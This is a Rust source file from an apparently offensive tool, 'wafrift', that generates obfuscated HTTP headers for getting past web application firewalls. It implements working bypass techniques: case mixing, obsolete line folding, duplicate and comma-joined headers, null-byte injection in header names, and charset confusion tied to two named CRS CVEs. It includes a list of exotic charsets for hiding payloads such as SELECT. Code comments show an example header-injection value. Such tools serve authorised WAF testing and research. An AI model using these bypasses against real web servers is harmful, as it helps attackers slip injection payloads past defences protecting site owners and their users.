Skip to main content

wafrift_encoding/
header.rs

//! HTTP header obfuscation for WAF bypass.
//!
//! WAFs inspect HTTP headers to detect malicious requests. This module
//! applies transformations that are valid per HTTP RFCs but confuse
//! WAF header parsers, causing them to misparse or skip inspection.
//!
//! # Techniques
//!
//! - **Case mixing** — `cOnTeNt-TyPe` instead of `Content-Type`
//! - **Whitespace tricks** — tabs, spaces around colons and values
//! - **Header folding** — obsolete but still parsed by many servers (RFC 7230 §3.2.4)
//! - **Duplicate headers** — WAF and server disagree on whether the first or last occurrence wins
//! - **Underscore substitution** — `Content_Type` accepted by some servers
//! - **Null byte injection** — a `\x00` inside the header name truncates it for C-string parsers
//! - **Trailing space** — `Content-Type : value`, a space between the header name and the colon
//! - **Header value wrapping** — value spread across multiple continuation lines
//! - **Comma-joined header values** — multiple values in one header via comma
18
19use std::fmt;
20use wafrift_types::hash::{FNV_OFFSET_64, FNV_PRIME_64};
21
22/// A header transformation technique.
23#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, serde::Serialize, serde::Deserialize)]
24#[non_exhaustive]
25pub enum HeaderTechnique {
26    /// Random case mixing of header name.
27    CaseMixing,
28    /// Tab character instead of space after colon.
29    TabSeparator,
30    /// Extra whitespace around header value.
31    WhitespacePadding,
32    /// Obsolete header folding with continuation line (CRLF + whitespace).
33    LineFolding,
34    /// LF-only continuation line.
35    LfOnlyLineFolding,
36    /// Duplicate header with benign value first.
37    DuplicateHeader,
38    /// Underscore instead of hyphen in header name.
39    UnderscoreSubstitution,
40    /// Null byte injected into header name.
41    NullByteInjection,
42    /// Trailing space before colon in header name.
43    TrailingSpace,
44    /// Header value wrapped across multiple continuation lines.
45    MultiLineFolding,
46    /// LF-only multi-line folding.
47    LfOnlyMultiLineFolding,
48    /// Multiple values comma-joined in a single header.
49    CommaJoin,
50}
51
52impl fmt::Display for HeaderTechnique {
53    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
54        match self {
55            Self::CaseMixing => f.write_str("case-mixing"),
56            Self::TabSeparator => f.write_str("tab-separator"),
57            Self::WhitespacePadding => f.write_str("whitespace-padding"),
58            Self::LineFolding => f.write_str("line-folding"),
59            Self::LfOnlyLineFolding => f.write_str("lf-only-line-folding"),
60            Self::DuplicateHeader => f.write_str("duplicate-header"),
61            Self::UnderscoreSubstitution => f.write_str("underscore-substitution"),
62            Self::NullByteInjection => f.write_str("null-byte-injection"),
63            Self::TrailingSpace => f.write_str("trailing-space"),
64            Self::MultiLineFolding => f.write_str("multi-line-folding"),
65            Self::LfOnlyMultiLineFolding => f.write_str("lf-only-multi-line-folding"),
66            Self::CommaJoin => f.write_str("comma-join"),
67        }
68    }
69}
70
71/// Apply case mixing to a header name.
72///
73/// Produces `cOnTeNt-TyPe` style output. HTTP header names are defined
74/// as case-insensitive (RFC 7230 §3.2), so servers accept any casing,
75/// but some WAFs only match canonical `Content-Type`.
76#[must_use]
77pub fn case_mix(header_name: &str) -> String {
78    crate::encoding::keyword::alternating_case(header_name, false)
79}
80
/// Return `value` with every CR (`\r`), LF (`\n`) and NUL (`\0`) removed.
///
/// The mutators in this module embed the caller's value into a header
/// line. Without this filter a value such as `x\r\nEvil-Header: pwn`
/// would place a second, attacker-chosen header line on the wire
/// (request smuggling / response splitting). Neither the transport layer
/// nor these helpers used to strip such bytes, each assuming the other
/// did; filtering here closes that gap without changing any public
/// signature.
///
/// All other characters, including tabs and non-ASCII text, are kept.
fn sanitize_header_value(value: &str) -> String {
    let mut cleaned = String::with_capacity(value.len());
    for ch in value.chars() {
        if !matches!(ch, '\r' | '\n' | '\0') {
            cleaned.push(ch);
        }
    }
    cleaned
}
95
96/// Apply tab separator: `Header:\tvalue` instead of `Header: value`.
97#[must_use]
98pub fn tab_separator(header_name: &str, value: &str) -> String {
99    let value = sanitize_header_value(value);
100    format!("{header_name}:\t{value}")
101}
102
103/// Apply whitespace padding around the value.
104///
105/// F136: pad count is derived deterministically from `header_name + value`
106/// via FNV-1a, NOT `rand::random`. A non-deterministic encoder cannot be
107/// regression-pinned and makes a successful bypass impossible to reproduce
108/// (every other tamper in this crate is deterministic for exactly this
109/// reason — see `parameter_pollute`'s F114 fix). The output pad range
110/// (2–5 spaces) is unchanged.
111#[must_use]
112pub fn whitespace_pad(header_name: &str, value: &str) -> String {
113    let value = sanitize_header_value(value);
114    let mut h: u64 = FNV_OFFSET_64;
115    for b in header_name.bytes().chain(value.bytes()) {
116        h ^= u64::from(b);
117        h = h.wrapping_mul(FNV_PRIME_64);
118    }
119    let pad_count = (h as usize % 4) + 2; // 2–5 spaces, deterministic
120    let pad = " ".repeat(pad_count);
121    format!("{header_name}:{pad}{value}{pad}")
122}
123
124/// Apply obsolete line folding (RFC 7230 §3.2.4).
125///
126/// The header value is split across two lines with a continuation marker
127/// (CRLF followed by a space or tab). This is obsolete but many servers
128/// still accept it, while WAFs often do not reassemble folded headers.
129#[must_use]
130pub fn line_fold(header_name: &str, value: &str) -> String {
131    line_fold_with_ending(header_name, value, "\r\n")
132}
133
134/// Apply LF-only line folding.
135#[must_use]
136pub fn lf_only_line_fold(header_name: &str, value: &str) -> String {
137    line_fold_with_ending(header_name, value, "\n")
138}
139
140fn line_fold_with_ending(header_name: &str, value: &str, ending: &str) -> String {
141    let value = sanitize_header_value(value);
142    if value.len() < 4 {
143        return format!("{header_name}: {value}");
144    }
145    let mid = crate::floor_char_boundary(&value, value.len() / 2);
146    format!(
147        "{}: {}{ending}\t{}",
148        header_name,
149        &value[..mid],
150        &value[mid..]
151    )
152}
153
154/// Apply multi-line folding — value spread across 3+ continuation lines.
155///
156/// More aggressive than single fold — splits value into thirds.
157/// Many WAFs only handle one continuation line.
158#[must_use]
159pub fn multi_line_fold(header_name: &str, value: &str) -> String {
160    multi_line_fold_with_ending(header_name, value, "\r\n")
161}
162
163/// Apply LF-only multi-line folding.
164#[must_use]
165pub fn lf_only_multi_line_fold(header_name: &str, value: &str) -> String {
166    multi_line_fold_with_ending(header_name, value, "\n")
167}
168
169fn multi_line_fold_with_ending(header_name: &str, value: &str, ending: &str) -> String {
170    let value = sanitize_header_value(value);
171    if value.len() < 6 {
172        return format!("{header_name}: {value}");
173    }
174    let t1 = crate::floor_char_boundary(&value, value.len() / 3);
175    let t2 = crate::floor_char_boundary(&value, value.len() * 2 / 3);
176    format!(
177        "{}: {}{ending} {}{ending}\t{}",
178        header_name,
179        &value[..t1],
180        &value[t1..t2],
181        &value[t2..]
182    )
183}
184
185/// Generate a duplicate header pair: returns `(benign_line, real_line)`.
186///
187/// Some WAFs only inspect the first occurrence of a header, while many
188/// servers use the last. By placing a benign value first and the real
189/// value second, the WAF sees the benign header, the server sees the
190/// real one.
191#[must_use]
192pub fn duplicate_header(
193    header_name: &str,
194    real_value: &str,
195    benign_value: &str,
196) -> (String, String) {
197    let real = sanitize_header_value(real_value);
198    let benign = sanitize_header_value(benign_value);
199    (
200        format!("{header_name}: {benign}"),
201        format!("{header_name}: {real}"),
202    )
203}
204
/// Swap every `-` in the header name for `_`.
///
/// Some web servers (notably PHP via `$_SERVER`, and CGI) normalise
/// `Content_Type` to `Content-Type`; WAFs typically do not.
#[must_use]
pub fn underscore_substitute(header_name: &str) -> String {
    header_name
        .chars()
        .map(|ch| if ch == '-' { '_' } else { ch })
        .collect()
}
213
214/// Inject a null byte into the header name at the midpoint.
215///
216/// Some C-based WAF implementations (modSecurity, native nginx modules)
217/// use null-terminated string operations internally. A null byte in the
218/// header name causes the WAF to see a truncated name (e.g., `Content`
219/// instead of `Content-Type\x00`), while the upstream server may parse
220/// the full name.
221#[must_use]
222pub fn null_byte_inject(header_name: &str) -> String {
223    if header_name.len() < 2 {
224        return header_name.to_string();
225    }
226    let mid = crate::floor_char_boundary(header_name, header_name.len() / 2);
227    format!("{}\x00{}", &header_name[..mid], &header_name[mid..])
228}
229
230/// Add a trailing space before the colon separator.
231///
232/// `Content-Type : value` — some parsers strip the space, making this
233/// equivalent. WAFs that expect `Name:` or `Name: ` without extra space
234/// in the header name field may fail to match.
235#[must_use]
236pub fn trailing_space(header_name: &str, value: &str) -> String {
237    let value = sanitize_header_value(value);
238    format!("{header_name} : {value}")
239}
240
241/// Comma-join multiple values into a single header.
242///
243/// Per RFC 7230 §3.2.6, a recipient may combine multiple header fields
244/// with the same name into one `field-value` separated by commas.
245/// `Header: benign, malicious` is semantically equivalent to two
246/// separate `Header: benign` and `Header: malicious` lines. WAFs that
247/// split on the first comma may only inspect `benign`.
248#[must_use]
249pub fn comma_join(header_name: &str, real_value: &str, benign_value: &str) -> String {
250    let real = sanitize_header_value(real_value);
251    let benign = sanitize_header_value(benign_value);
252    format!("{header_name}: {benign}, {real}")
253}
254
255/// Build a `Content-Type` header with an exotic charset claim.
256///
257/// CVE-2022-39956 (Content-Type/Content-Transfer-Encoding abuse) +
258/// CVE-2022-39957 (Accept-Charset bypass) — OWASP CRS pre-3.3.3 did
259/// not validate the charset field before running UTF-8 regex rules.
260/// Attacker claims `charset=ibm037` (EBCDIC) or `charset=utf-32`;
261/// WAF runs regex against bytes that aren't even ASCII-`SELECT`, so
262/// the rule misses. Backend re-decodes via its own charset
263/// negotiation and sees the original payload.
264///
265/// Still relevant for unpatched CRS deployments AND for WAFs
266/// (Cloudflare, AWS) that don't fully validate charset before
267/// scanning. Fixed in CRS 3.3.3 / 3.2.2 (Sept 2022).
268#[must_use]
269pub fn charset_confusion(media_type: &str, charset: &str) -> String {
270    // No sanitize_header_value here — the whole point is exotic
271    // charset claims; the WAF SHOULD accept the line per RFC.
272    format!("Content-Type: {media_type}; charset={charset}")
273}
274
/// Charset names intended for use as the `charset` argument of
/// `charset_confusion`.
///
/// Each entry is a real IANA charset that some backend will accept and
/// that a hand-rolled WAF regex will not decode.
pub const EXOTIC_CHARSETS: &[&str] = &[
    // EBCDIC: letters and digits use different byte values than ASCII.
    "ibm037",
    // EBCDIC variant.
    "ibm500",
    // Four bytes per character, so an ASCII regex misses.
    "utf-32",
    "utf-32be",
    "utf-16",
    "utf-16be",
    // Text can hide in base64 runs: SELECT may be sent as +AFMARQBMAEUAQwBU-
    "utf-7",
    // Japanese, partial ASCII overlap.
    "shift_jis",
    // Chinese.
    "gb18030",
    // Stateful: an escape sequence can precede SELECT.
    "iso-2022-jp",
];
290
291/// Apply all header obfuscation techniques to a header name/value pair.
292///
293/// Returns a vector of `(technique, obfuscated_header_line)` pairs.
294/// For `DuplicateHeader`, the two lines are joined with CRLF.
295#[must_use]
296pub fn all_obfuscations(header_name: &str, value: &str) -> Vec<(HeaderTechnique, String)> {
297    let benign = "safe_value";
298    // Three entries below (CaseMixing, UnderscoreSubstitution,
299    // NullByteInjection) transform only the header NAME and interpolate
300    // the value inline, so they must sanitise it here the same way the
301    // helper-based entries do internally — otherwise a value containing
302    // `\r\n` smuggles a header line on the wire. This is the exact gap
303    // `sanitize_header_value` was added to close; these inline format!s
304    // were missed by that fix. (The helper-based entries below sanitise
305    // internally, so passing the raw `value` to them stays correct.)
306    let safe_value = sanitize_header_value(value);
307    vec![
308        (
309            HeaderTechnique::CaseMixing,
310            format!("{}: {}", case_mix(header_name), safe_value),
311        ),
312        (
313            HeaderTechnique::TabSeparator,
314            tab_separator(header_name, value),
315        ),
316        (
317            HeaderTechnique::WhitespacePadding,
318            whitespace_pad(header_name, value),
319        ),
320        (HeaderTechnique::LineFolding, line_fold(header_name, value)),
321        (
322            HeaderTechnique::LfOnlyLineFolding,
323            lf_only_line_fold(header_name, value),
324        ),
325        (HeaderTechnique::DuplicateHeader, {
326            let (a, b) = duplicate_header(header_name, value, benign);
327            format!("{a}\r\n{b}")
328        }),
329        (
330            HeaderTechnique::UnderscoreSubstitution,
331            format!("{}: {}", underscore_substitute(header_name), safe_value),
332        ),
333        (
334            HeaderTechnique::NullByteInjection,
335            format!("{}: {}", null_byte_inject(header_name), safe_value),
336        ),
337        (
338            HeaderTechnique::TrailingSpace,
339            trailing_space(header_name, value),
340        ),
341        (
342            HeaderTechnique::MultiLineFolding,
343            multi_line_fold(header_name, value),
344        ),
345        (
346            HeaderTechnique::LfOnlyMultiLineFolding,
347            lf_only_multi_line_fold(header_name, value),
348        ),
349        (
350            HeaderTechnique::CommaJoin,
351            comma_join(header_name, value, benign),
352        ),
353    ]
354}
355
356#[cfg(test)]
357#[path = "header_tests.rs"]
358mod tests;